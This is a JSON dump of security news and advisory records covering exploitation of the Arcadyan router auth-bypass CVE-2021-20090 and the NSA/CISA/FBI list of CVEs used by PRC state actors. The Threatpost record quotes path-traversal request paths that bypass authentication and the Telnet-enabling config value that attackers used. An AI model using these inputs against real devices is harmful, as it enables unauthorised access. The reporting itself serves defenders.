[CVE-2021-22502](<https://nvd.nist.gov/vuln/detail/CVE-2021-22502>) (Remote code execution flaw in Micro Focus Operation Bridge Reporter)\n * [CVE-2021-22506](<https://nvd.nist.gov/vuln/detail/CVE-2021-22506>) (Information Leakage vulnerability in Micro Focus 
Access Manager)\n\nUnit 42's report had previously uncovered as many as six known and three unknown security flaws that were exploited in the attacks, counting those targeted at SonicWall SSL-VPNs, D-Link DNS-320 firewalls, Netis WF2419 wireless routers, and Netgear ProSAFE Plus switches.\n\nTo avoid any potential compromise, users are recommended to update their router firmware to the latest version.\n\n\"It is clear that threat actors keep an eye on all disclosed vulnerabilities. Whenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T09:27:00", "type": "thn", "title": "Hackers Exploiting New Auth Bypass Bug Affecting Millions of Arcadyan Routers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-11T03:38:35", "id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-09T19:54:43", "description": "An authentication-bypass vulnerability affecting multiple routers and internet-of-things (IoT) devices is being actively exploited in the wild, according to researchers.\n\nThe security flaw, tracked as CVE-2021-20090, was disclosed last week by researchers at Tenable. It affects devices from 20 different vendors and ISPs (ADB, Arcadyan, ASMAX, ASUS, Beeline, British Telecom, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom [Argentina], TelMex, Telstra, Telus, Verizon and Vodafone), all of which use the same firmware from Arcadyan. In all, millions of devices worldwide could be vulnerable.\n\nTenable [demonstrated](<https://www.tenable.com/security/research/tra-2021-13>) in a proof of concept (PoC) that it\u2019s possible to modify a device\u2019s configuration to enable Telnet on a vulnerable router and gain root level shell access to the device.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists due to a list of folders which fall under a \u2018bypass list\u2019 for authentication,\u201d according to Tenable\u2019s advisory on August 3. \u201cFor most of the devices listed, that means that the vulnerability can be triggered by multiple paths. 
For a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\n * http://<ip>/images/..%2findex.htm\n * http://<ip>/js/..%2findex.htm\n * http://<ip>/css/..%2findex.htm\n\n\u201cTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal,\u201d the advisory continued.\n\n## **Exploited to Spread Mirai Variant**\n\nJust three days after disclosure, on Friday, cybersecurity researchers from Juniper Networks said they had discovered active exploitation of the bug.\n\n\u201cWe have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,\u201d they wrote [in a post](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>). \u201cThe attacker seems to be attempting to deploy a [Mirai variant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) on the affected routers.\u201d\n\nCleaving close to Tenable\u2019s PoC, the attackers are modifying the configuration of the attacked device to enable Telnet using \u201cARC_SYS_TelnetdEnable=1\u201d to take control, according to Juniper. Then, they proceed to download the Mirai variant from a command-and-control (C2) server and execute it.\n\nMirai is a long-running botnet that infects connected devices and can be used to mount distributed denial-of-service (DDoS) attacks. It [burst on the scene](<https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/>) in 2016, when it overwhelmed servers at the Dyn web hosting company, taking down more than 1,200 websites, including Netflix and Twitter. 
Its source code [was leaked](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) later that year, after which multiple Mirai variants began to crop up, in a barrage that continues to this day.\n\nSome of the scripts in the current set of attacks bear resemblance to previously observed activity picked up in February and March, according to Juniper.\n\n\u201cThe similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\u201d researchers wrote. \u201cGiven that most people may not even be aware of the security risk and won\u2019t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.\u201d\n\nIn addition to the router bug, Juniper researchers observed the following known vulnerabilities being exploited to gain initial access to target devices:\n\n * CVE-2020-29557 (DLink routers)\n * CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)\n * CVE-2021-31755 (Tenda AC11)\n * CVE-2021-22502 (MicroFocus OBR)\n * CVE-2021-22506 (MicroFocus AM)\n\nIn fact, the attackers have been continuously adding new exploits to its arsenal, according to the posting, and CVE-2021-20090 is unlikely to be the last.\n\n\u201cIt is clear that threat actors keep an eye on all disclosed vulnerabilities,\u201d researchers concluded. \u201cWhenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks.\u201d\n\nTo avoid compromise, users should update their firmware on the router.\n\n\u201cIn the case of IoT devices or home gateways, the situation is much worse as most users are not tech-savvy and even those who are do not get informed about potential vulnerabilities and patches to apply,\u201d according to Juniper. 
\u201cThe only sure way to remedy this issue is to require vendors to offer zero-down-time automatic updates.\u201d\n\n**Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T19:41:30", "type": "threatpost", "title": "Auth Bypass Bug Exploited, Millions of Routers Affected", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", 
"CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-09T19:41:30", "id": "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "href": "https://threatpost.com/auth-bypass-bug-routers-exploited/168491/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-10-12T20:01:11", "description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on the activity of state-sponsored cyber actors of the Chinese government\u2014officially known as the People\u2019s Republic of China (PRC)\u2014in pursuit of national interests. These malicious cyber activities attributed to the Chinese government have targeted, and continue to target, a mixture of industries and organizations in the United States. The advisory provides the top CVEs used since 2020 by the People's Republic of China (PRC) state-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). The PRC malicious actors continue to exploit known vulnerabilities to target U.S. and allied networks, as well as software and hardware companies, to steal intellectual property and develop access to sensitive networks. \n\nThey stated that PRC state-sponsored cyber activities are one of the most significant and dynamic threats to U.S. government and civilian networks. The PRC state-sponsored cyber actors persist in targeting government and critical infrastructure networks with an increasing array of new and adaptive techniques. Some could pose a considerable risk to the Information Technology Sector, telecommunications organizations, the Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. 
\n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target victims. Here is a list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor**| **CVE**| **Vulnerability Type**| Qualys **QID**(s) \n---|---|---|--- \n| | | \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZOHO | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nNSA stated that the threat actors use virtual private networks (VPNs) to 
obscure their activities and establish initial access. Multiple CVEs indicated in Table 1 let the actors stealthily acquire unauthorized access into sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. \n\nThe NSA highlights how the People\u2019s Republic of China (PRC) has targeted and compromised significant telecom establishments and network service providers mostly by exploiting publicly known vulnerabilities. Networks affected have varied from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. These devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as a means to conduct network intrusions on other entities. Furthermore, cyber defenders, who are occupied with keeping pace with frequent software patching of Internet-facing services and endpoint devices, often overlook these devices. \n\n## Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. 
You can search for these QIDs in the Vulnerabilities tab of [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\n\n\nUsing [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also effectively prioritize these vulnerabilities using [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>).\n\n\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nUsing the Qualys Unified Dashboard, you can track impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n\n\n## Recommendations & Mitigations \n\nThe NSA, CISA, and FBI recommend that U.S. and allied governments, critical infrastructure, and private sector organizations use the mitigation guidance provided to boost their defensive posture and decrease the threat of compromise from PRC state-sponsored cyber actors. 
\n\nHere is a summary of the mitigation guidance provided by the NSA: \n\n * Update, prioritize, and patch vulnerable systems as soon as possible, as listed in this article and in the list provided by [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n * Utilize phishing-resistant multi-factor authentication and require a unique and strong password for every account. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nOne of the soundest ways for organizations of all sizes to stay on top of these vulnerabilities and end-of-life (EOL) network/device infrastructure, as noted in the NSA's general mitigation guidelines, is to catalog the affected assets and apply patches as soon as possible. This could be an effortless process for organizations that utilize the power of Qualys VMDR 2.0. You can start your [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect, and patch the high-priority commonly exploited vulnerabilities. 
\n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": "qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2023-04-23T15:50:43", "description": "Hello everyone! 
This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, [Joint cybersecurity advisory (CSA) AA22-279A](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>), and how I analyzed these vulnerabilities using my open source project [Vulristics](<https://github.com/leonov-av/vulristics>). \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239105>\n\nAmericans can't just release a list of "20 vulnerabilities most commonly exploited in attacks on American organizations." They like to add geopolitics and point the finger at some country. Therefore, I leave the attack attribution mentioned in the advisory title without comment.\n\nBut I like such lists of vulnerabilities for a number of reasons:\n\n * Such lists of **vulnerabilities** show which CVEs need to be addressed. This is the most obvious. If you notice vulnerabilities from the list in your infrastructure, start fixing them as soon as possible.\n * Such lists of vulnerabilities show the **software and hardware products** that are most important to monitor. This means that your vulnerability scanner must support this software very well. Make sure you can verify this.\n * Such lists of vulnerabilities show **groups of software and hardware products **that need to be monitored first. Usually these are products that are available to a wide range of users and are inconvenient to upgrade.\n * Such lists of vulnerabilities show **the types of vulnerabilities** that you need to pay attention to first.\n * Such lists of vulnerabilities are relatively compact and **can be easily analyzed** even manually.\n\nI can't help but notice that the quality of the advisory is not very high. For example, the description of vulnerabilities was automatically taken from NVD. Including this: \n\n"Microsoft Exchange Server remote code execution vulnerability. 
This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078". \n\nNot very informative, right? This joint advisory was released by three big serious organizations. They could work harder and write a unique text for each of the 20 CVEs. But no one seems to care.\n\nHere is a list of all vulnerabilities from the advisory:\n\n 1. Apache Log4j CVE-2021-44228 Remote Code Execution\n 2. Pulse Connect Secure CVE-2019-11510 Arbitrary File Read\n 3. GitLab CE/EE CVE-2021-22205 Remote Code Execution\n 4. Atlassian CVE-2022-26134 Remote Code Execution\n 5. Microsoft Exchange CVE-2021-26855 Remote Code Execution\n 6. F5 Big-IP CVE-2020-5902 Remote Code Execution\n 7. VMware vCenter Server CVE-2021-22005 Arbitrary File Upload\n 8. Citrix ADC CVE-2019-19781 Path Traversal\n 9. Cisco Hyperflex CVE-2021-1497 Command Line Execution\n 10. Buffalo WSR CVE-2021-20090 Relative Path Traversal\n 11. Atlassian Confluence Server and Data Center CVE-2021-26084 Remote Code Execution\n 12. Hikvision Webserver CVE-2021-36260 Command Injection\n 13. Sitecore XP CVE-2021-42237 Remote Code Execution\n 14. F5 Big-IP CVE-2022-1388 Remote Code Execution\n 15. Apache CVE-2022-24112 Authentication Bypass by Spoofing\n 16. ZOHO CVE-2021-40539 Remote Code Execution\n 17. Microsoft CVE-2021-26857 Remote Code Execution\n 18. Microsoft CVE-2021-26858 Remote Code Execution\n 19. Microsoft CVE-2021-27065 Remote Code Execution\n 20. Apache HTTP Server CVE-2021-41773 Path Traversal\n\nOf course, I did not deny myself the pleasure of using this list of CVEs as input for my [Vulristics vulnerability prioritization tool](<https://github.com/leonov-av/vulristics>). 
Just to see how Vulristics handles it and tweak Vulristics if needed.\n\nHere is the command I used to generate the report:\n \n \n $ python3.8 vulristics.py --report-type \"cve_list\" --cve-project-name \"AA22-279A\" --cve-list-path joint_cves.txt --cve-data-sources \"ms,nvd,vulners,attackerkb\" --cve-comments-path comments.txt --rewrite-flag \"True\"\n\nThe full report is here: <https://avleonov.com/vulristics_reports/aa22-279a_report_with_comments_ext_img.html>\n\n## Vulnerable Products\n\nIf you look at the list of vulnerable software and hardware products, then some of them, obviously, should have been included in this advisory. Because lately there have been a lot of publications about how attackers exploit the vulnerabilities in these products:\n\n * Apache HTTP Server\n * Apache Log4j2\n * GitLab\n * Microsoft Exchange\n * Confluence Server\n * Zoho ManageEngine ADSelfService Plus\n * Pulse Connect Secure\n\nThe second group of products. For them, there were also publications about attacks. But it seems that these are more niche products and are less perceived as targets for attackers:\n\n * BIG-IP\n * Citrix Application Delivery Controller\n * VMware vCenter\n * Cisco HyperFlex HX\n\nAnd finally, there are quite exotic products that apparently reflect the specifics of American IT:\n\n * Sitecore Experience Platform (XP)\n * Hikvision Web Server\n * Apache APISIX\n * Buffalo WSR\n\n## Criticality of Vulnerabilities\n\nVulristics has identified all vulnerabilities as vulnerabilities of the highest criticality level (Urgent). 
Vulristics found public exploits for all vulnerabilities.\n\nAt the same time, if you look at CVSS, then there is this:\n\nAll vulnerabilities: 20 \nCritical: 16 \nHigh: 4 \nMedium: 0 \nLow: 0\n\nSo if you are using CVSS for prioritization, don't forget about the High level vulnerabilities.\n\n## Detected Types of Vulnerabilities\n\n * Remote Code Execution\n * Command Injection\n * Arbitrary File Reading\n * Authentication Bypass\n * Path Traversal\n\nAs we can see, all vulnerabilities are obviously critical except for one "Path Traversal":\n\nPath Traversal - Citrix Application Delivery Controller (CVE-2019-19781)\n\nThe description of the vulnerability leaves no room for detecting another type:\n\n"An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal".\n\nThe same type is indicated in the advisory AA22-279A: Citrix ADC CVE-2019-19781 Path Traversal\n\nAnd only [in the description of the exploit](<https://github.com/trustedsec/cve-2019-19781>) we can see that this is in fact RCE: "This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for **remote code execution**."\n\nWell, this is another reminder to us that we should not do hard filtering by vulnerability type. It's also not a good idea to trust the description from NVD. The type of vulnerability may change over time, and no one will make changes to the description in NVD.\n\nIn some cases, Vulristics can help to more accurately determine the type of vulnerability:\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773)\n\nWhy? 
Because we can read in the description: "If CGI scripts are also enabled for these aliased pathes, this could allow for **remote code execution**."\n\nBut of course Vulristics is not a silver bullet. It is difficult to come up with something here other than manual analysis of publications about vulnerabilities and exploits.\n\nI also cannot help but point out that for some of the vulnerabilities, Vulristics determined the vulnerability types more correctly, in accordance with the description:\n\nAA22-279A: GitLab CE/EE CVE-2021-22205 Remote Code Execution \nVulristics: Command Injection - GitLab (CVE-2021-22205) - Urgent [947] \n"\u2026 which resulted in a **remote command execution**."\n\nAA22-279A: Sitecore XP CVE-2021-42237 Remote Code Execution \nVulristics: Command Injection - Sitecore Experience Platform (XP) (CVE-2021-42237) \n"\u2026 it is possible to achieve **remote command execution** on the machine."\n\nAA22-279A: VMware vCenter Server CVE-2021-22005 Arbitrary File Upload \nVulristics: Remote Code Execution - VMware vCenter (CVE-2021-22005) \n"\u2026may exploit this issue **to execute code** on vCenter Server by uploading a specially crafted file."\n\nAA22-279A: F5 Big-IP CVE-2022-1388 Remote Code Execution \nVulristics: Authentication Bypass - BIG-IP (CVE-2022-1388) \n"\u2026 undisclosed requests **may bypass** iControl REST **authentication**"\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773) \n"\u2026 this could allow for **remote code execution**."\n\nAA22-279A: Apache CVE-2022-24112 Authentication Bypass by Spoofing \nVulristics: Remote Code Execution - Apache APISIX (CVE-2022-24112) \n"\u2026 is vulnerable to **remote code execution**."\n\nAA22-279A: Buffalo WSR CVE-2021-20090 Relative Path Traversal \nVulristics: Authentication Bypass - Buffalo WSR (CVE-2021-20090) \n"\u2026 allow unauthenticated remote attackers to **bypass authentication**."\n\nTherefore, 
do not rush to trust the vulnerability type from the [CISA Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and take it into account when prioritizing vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-21T20:10:13", "type": "avleonov", "title": "Joint Advisory AA22-279A and Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-21T20:10:13", "id": "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246", "href": "https://avleonov.com/2022/10/21/joint-advisory-aa22-279a-and-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-05-27T16:26:45", 
"description": "### Summary\n\nThis joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People\u2019s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.\n\nThis joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\n\nNSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.\n\nFor more information on PRC state-sponsored malicious cyber activity, see CISA\u2019s [China Cyber Threat Overview and Advisories webpage](<https://www.cisa.gov/uscert/china>), FBI\u2019s [Industry Alerts](<https://www.ic3.gov/Home/IndustryAlerts>), and NSA\u2019s [Cybersecurity Advisories & Guidance](<https://www.nsa.gov/Press-Room/Cybersecurity-Advisories-Guidance/>). \n\nDownload the PDF version of this report: [pdf, 409 KB](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>)\n\n### Technical Details\n\nNSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. 
PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques\u2014some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.\n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks. See Table 1 for the top used CVEs.\n\n_Table I: Top CVEs most used by Chinese state-sponsored cyber actors since 2020_\n\nVendor\n\n| \n\nCVE\n\n| \n\nVulnerability Type \n \n---|---|--- \n \nApache Log4j\n\n| \n\nCVE-2021-44228\n\n| \n\nRemote Code Execution \n \nPulse Connect Secure\n\n| \n\nCVE-2019-11510\n\n| \n\nArbitrary File Read \n \nGitLab CE/EE\n\n| \n\nCVE-2021-22205\n\n| \n\nRemote Code Execution \n \nAtlassian\n\n| \n\nCVE-2022-26134\n\n| \n\nRemote Code Execution \n \nMicrosoft Exchange\n\n| \n\nCVE-2021-26855\n\n| \n\nRemote Code Execution \n \nF5 Big-IP\n\n| \n\nCVE-2020-5902\n\n| \n\nRemote Code Execution \n \nVMware 